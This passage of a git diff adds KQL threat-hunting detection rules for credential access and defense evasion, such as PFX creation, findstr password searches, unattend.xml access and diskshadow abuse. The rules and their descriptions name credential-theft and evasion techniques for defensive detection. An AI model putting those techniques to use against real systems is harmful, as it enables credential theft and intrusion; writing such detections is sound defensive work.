- Legitimate log access by administrators or troubleshooting tools + +DeviceProcessEvents +| where (ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql new file mode 100644 index 00000000..a108ce05 --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql @@ -0,0 +1,26 @@ +// Title: PFX File Creation +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: low +// Description: Detects the creation of PFX files (Personal Information Exchange format). +PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to: + + - Exfiltrate digital certificates for impersonation or signing malicious code + - Establish persistent access through certificate-based authentication + - Bypass security controls that rely on certificate validation + +Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting +// False Positives: +// - System administrators legitimately managing certificates and PKI infrastructure +// - Development environments where developers create test certificates for application signing +// - Automated certificate deployment tools and scripts used in enterprise environments +// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients) +// - Certificate backup and recovery operations performed by IT staff +// - Build systems and CI/CD pipelines that generate code signing certificates +// - Third-party applications that create temporary certificates for secure communications + +DeviceFileEvents +| where FolderPath endswith ".pfx" and (not((FolderPath startswith "C:\\Program Files\\CMake\\" or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe")) and FolderPath endswith "\\OneDrive\\CodeSigning.pfx") or (FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql new file mode 100644 index 00000000..bcae8b3a --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Password Reconnaissance Via Findstr.EXE +// Author: Josh Nickels +// Date: 2023-05-18 +// Level: medium +// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting + +DeviceProcessEvents +| where (ProcessCommandLine contains "contraseña" or ProcessCommandLine contains "hasło" or ProcessCommandLine contains "heslo" or ProcessCommandLine contains "parola" or ProcessCommandLine contains "passe" or ProcessCommandLine contains "passw" or ProcessCommandLine contains "senha" or ProcessCommandLine contains "senord" or ProcessCommandLine contains "密碼") and (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql new file mode 100644 index 00000000..01401fe1 --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql @@ -0,0 +1,12 @@ +// Title: Unattend.XML File Access Attempt +// Author: frack113 +// Date: 2024-07-22 +// Level: low +// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. +This file is used during the unattended windows install process. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting + +DeviceFileEvents +| where FileName endswith "\\Panther\\unattend.xml" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql new file mode 100644 index 00000000..fd5762fa --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql @@ -0,0 +1,12 @@ +// Title: Access To .Reg/.Hive Files By Uncommon Applications +// Author: frack113 +// Date: 2023-09-15 +// Level: low +// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting +// False Positives: +// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required. + +DeviceFileEvents +| where (FileName endswith ".hive" or FileName endswith ".reg") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql new file mode 100644 index 00000000..12150d0e --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql @@ -0,0 +1,18 @@ +// Title: Access To Windows Outlook Mail Files By Uncommon Applications +// Author: frack113 +// Date: 2024-05-10 +// Level: low +// Description: Detects file access requests to Windows Outlook Mail by uncommon processes. +Could indicate potential attempt of credential stealing. +Requires heavy baselining before usage + +// MITRE Tactic: Defense Evasion +// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents +| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql new file mode 100644 index 00000000..79bc3f45 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql @@ -0,0 +1,12 @@ +// Title: ADS Zone.Identifier Deleted +// Author: frack113 +// Date: 2023-09-04 +// Level: low +// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting +// False Positives: +// - Likely + +DeviceFileEvents +| where FolderPath endswith ":Zone.Identifier" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql new file mode 100644 index 00000000..0e137233 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql @@ -0,0 +1,12 @@ +// Title: Amsi.DLL Load By Uncommon Process +// Author: frack113 +// Date: 2023-03-12 +// Level: low +// Description: Detects loading of Amsi.dll by uncommon processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting +// False Positives: +// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly + +DeviceImageLoadEvents +| where FolderPath endswith "\\amsi.dll" and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\ngentask.exe") or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\") or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..c25c1963 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql @@ -0,0 +1,14 @@ +// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process +// Author: UnicornOfHunt +// Date: 2025-06-04 +// Level: low +// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. +This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting +// False Positives: +// - Allowed binaries in the environment that do BITS Jobs + +DeviceImageLoadEvents +| where FolderPath endswith "\\BitsProxy.dll" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\aitstatic.exe", "C:\\Windows\\System32\\bitsadmin.exe", "C:\\Windows\\System32\\desktopimgdownldr.exe", "C:\\Windows\\System32\\DeviceEnroller.exe", "C:\\Windows\\System32\\MDMAppInstaller.exe", "C:\\Windows\\System32\\ofdeploy.exe", "C:\\Windows\\System32\\RecoveryDrive.exe", "C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe", "C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe")))) and (not(InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql new file mode 100644 index 00000000..e433f0e5 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql @@ -0,0 +1,12 @@ +// Title: CodePage Modification Via MODE.COM +// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-19 +// Level: low +// Description: Detects a CodePage modification using the "mode.com" utility. +This behavior has been used by threat actors behind Dharma ransomware. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting + +DeviceProcessEvents +| where (ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql new file mode 100644 index 00000000..b35244e3 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql @@ -0,0 +1,12 @@ +// Title: Diskshadow Child Process Spawned +// Author: Harjot Singh @cyb3rjy0t +// Date: 2023-09-15 +// Level: medium +// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate usage of Diskshadow in Interpreter mode. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\diskshadow.exe" and (not(FolderPath endswith ":\\Windows\\System32\\WerFault.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql new file mode 100644 index 00000000..c4dbc326 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql @@ -0,0 +1,13 @@ +// Title: Diskshadow Script Mode Execution +// Author: Ivan Dyachkov, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate backup scripts + +DeviceProcessEvents +| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql new file mode 100644 index 00000000..7f88518a --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql @@ -0,0 +1,13 @@ +// Title: DLL Call by Ordinal Via Rundll32.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-22 +// Level: medium +// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment. +// - Windows control panel elements have been identified as source (mmc). + +DeviceProcessEvents +| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql new file mode 100644 index 00000000..252d516e --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql @@ -0,0 +1,15 @@ +// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address +// Author: bartblaze +// Date: 2020-07-13 +// Level: medium +// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. +Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. +An initial baseline is recommended before deployment. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "150.171.0.0/19") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql new file mode 100644 index 00000000..0928d6d1 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql @@ -0,0 +1,12 @@ +// Title: DMP/HDMP File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-07 +// Level: low +// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Likely during crashes of software + +DeviceFileEvents +| where FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql new file mode 100644 index 00000000..efea574b --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql @@ -0,0 +1,12 @@ +// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-02 +// Level: medium +// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting +// False Positives: +// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies + +DeviceProcessEvents +| where ProcessCommandLine contains "/noconfig /fullpaths @" and FolderPath endswith "\\csc.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql new file mode 100644 index 00000000..9bc12b94 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql @@ -0,0 +1,13 @@ +// Title: File or Folder Permissions Modifications +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-23 +// Level: medium +// Description: Detects a file or folder's permissions being modified or tampered with. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting +// False Positives: +// - Users interacting with the files on their own (unlikely unless privileged users). +// - Dynatrace app + +DeviceProcessEvents +| where (((ProcessCommandLine contains "/grant" or ProcessCommandLine contains "/setowner" or ProcessCommandLine contains "/inheritance:r") and (FolderPath endswith "\\cacls.exe" or FolderPath endswith "\\icacls.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "-r" and FolderPath endswith "\\attrib.exe") or FolderPath endswith "\\takeown.exe") and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\Avira" or ProcessCommandLine contains ":\\Program Files\\Avira") or ProcessCommandLine endswith "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset" or (ProcessCommandLine contains "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r " and ProcessCommandLine contains "S-1-5-19:F") or (ProcessCommandLine contains "\\AppData\\Local\\Programs\\Microsoft VS Code" or ProcessCommandLine contains ":\\Program Files\\Microsoft VS Code")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql new file mode 100644 index 00000000..8fa5768b --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql @@ -0,0 +1,12 @@ +// Title: Headless Process Launched Via Conhost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. +The "--headless" flag hides the windows from the user upon execution. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting + +DeviceProcessEvents +| where InitiatingProcessCommandLine contains "--headless" and InitiatingProcessFolderPath endswith "\\conhost.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql new file mode 100644 index 00000000..34135174 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql @@ -0,0 +1,13 @@ +// Title: HH.EXE Initiated HTTP Network Connection +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: medium +// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting +// False Positives: +// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events. + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql new file mode 100644 index 00000000..ec7342ce --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -0,0 +1,15 @@ +// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-12-01 +// Level: medium +// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. +The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +These can be used for example in decrypting malicious payload for defense evasion. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting +// False Positives: +// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. + +DeviceProcessEvents +| where (ProcessCommandLine contains ".AesCryptoServiceProvider" or ProcessCommandLine contains ".DESCryptoServiceProvider" or ProcessCommandLine contains ".DSACryptoServiceProvider" or ProcessCommandLine contains ".RC2CryptoServiceProvider" or ProcessCommandLine contains ".Rijndael" or ProcessCommandLine contains ".RSACryptoServiceProvider" or ProcessCommandLine contains ".TripleDESCryptoServiceProvider") and ProcessCommandLine contains "System.Security.Cryptography." and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql new file mode 100644 index 00000000..5676791a --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Office Trusted Location Updated +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: medium +// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting +// False Positives: +// - During office installations or setup, trusted locations are added, which will trigger this rule. + +DeviceRegistryEvents +| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql new file mode 100644 index 00000000..8ba554cb --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql @@ -0,0 +1,13 @@ +// Title: Microsoft Workflow Compiler Execution +// Author: Nik Seetharaman, frack113 +// Date: 2019-01-16 +// Level: medium +// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate MWC use (unlikely in modern enterprise environments) + +DeviceProcessEvents +| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql new file mode 100644 index 00000000..98995797 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql @@ -0,0 +1,15 @@ +// Title: Msiexec.EXE Initiated Network Connection Over HTTP +// Author: frack113 +// Date: 2022-01-16 +// Level: low +// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. +Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. +Use this rule to hunt for potentially anomalous or suspicious communications. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting +// False Positives: +// - Likely + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\msiexec.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql new file mode 100644 index 00000000..7822f107 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql @@ -0,0 +1,15 @@ +// Title: New Self Extracting Package Created Via IExpress.EXE +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-02-05 +// Level: medium +// Description: Detects the "iexpress.exe" utility creating self-extracting packages. +Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. +Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Administrators building packages using iexpress.exe + +DeviceProcessEvents +| where ((FolderPath endswith "\\makecab.exe" or ProcessVersionInfoOriginalFileName =~ "makecab.exe") and InitiatingProcessFolderPath endswith "\\iexpress.exe") or (ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql 